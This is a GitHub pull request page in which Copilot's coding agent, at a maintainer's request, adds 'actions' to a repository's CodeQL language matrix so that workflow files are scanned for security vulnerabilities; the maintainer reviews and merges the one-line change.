Skip to content

Enable CodeQL analysis for GitHub Actions workflows #9284

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
eaftan merged 2 commits into from
Jan 8, 2026
Merged

Enable CodeQL analysis for GitHub Actions workflows #9284

eaftan merged 2 commits into from
Jan 8, 2026
+1 −1

Conversation

Copy link
Contributor

Copilot AI commented Jan 7, 2026
edited
Loading

Adds 'actions' to the CodeQL language matrix to scan GitHub Actions workflow YAML files for security vulnerabilities.

Changes

  • Updated .github/workflows/codeql.yml to include 'actions' in the language matrix alongside 'go' and 'javascript'

Impact

CodeQL will now detect security issues in workflow files including:

  • Code injection vulnerabilities
  • Unpinned actions
  • Missing permissions
  • Artifact/cache poisoning
  • Secret exposure

Resolves security finding: https://security-findings.githubapp.com/finding?id=R2l0SHViSXNzdWVUeXBlOjI4MDkwNQ==&tab=vulnerabilities

Original prompt

Please update the CodeQL Actions workflow to also analyze actions. When you write the PR description, please note that this will resolve this security finding: https://security-findings.githubapp.com/finding?id=R2l0SHViSXNzdWVUeXBlOjI4MDkwNQ==&tab=vulnerabilities

💡 You can make Copilot smarter by setting up custom instructions, customizing its development environment and configuring Model Context Protocol (MCP) servers. Learn more Copilot coding agent tips in the docs.

Copilot AI self-assigned this Jan 7, 2026
@eaftan
Add actions language to CodeQL analysis matrix
83bf3d7 
Co-authored-by: eaftan <4733401+eaftan@users.noreply.github.com>
Copilot AI changed the title [WIP] Update CodeQL Actions workflow for action analysis Enable CodeQL analysis for GitHub Actions workflows Jan 8, 2026
Copilot AI requested a review from eaftan January 8, 2026 00:04
@eaftan eaftan marked this pull request as ready for review January 8, 2026 00:11
@eaftan eaftan merged commit c5c3406 into main Jan 8, 2026
@eaftan eaftan deleted the copilot/update-codeql-actions-workflow branch January 8, 2026 00:11
@github-actions github-actions bot mentioned this pull request Jan 8, 2026
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

1 more reviewer

@eaftan eaftan eaftan approved these changes

Reviewers whose approvals may not affect merge requirements

Assignees

@eaftan eaftan

Copilot code review Copilot

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@eaftan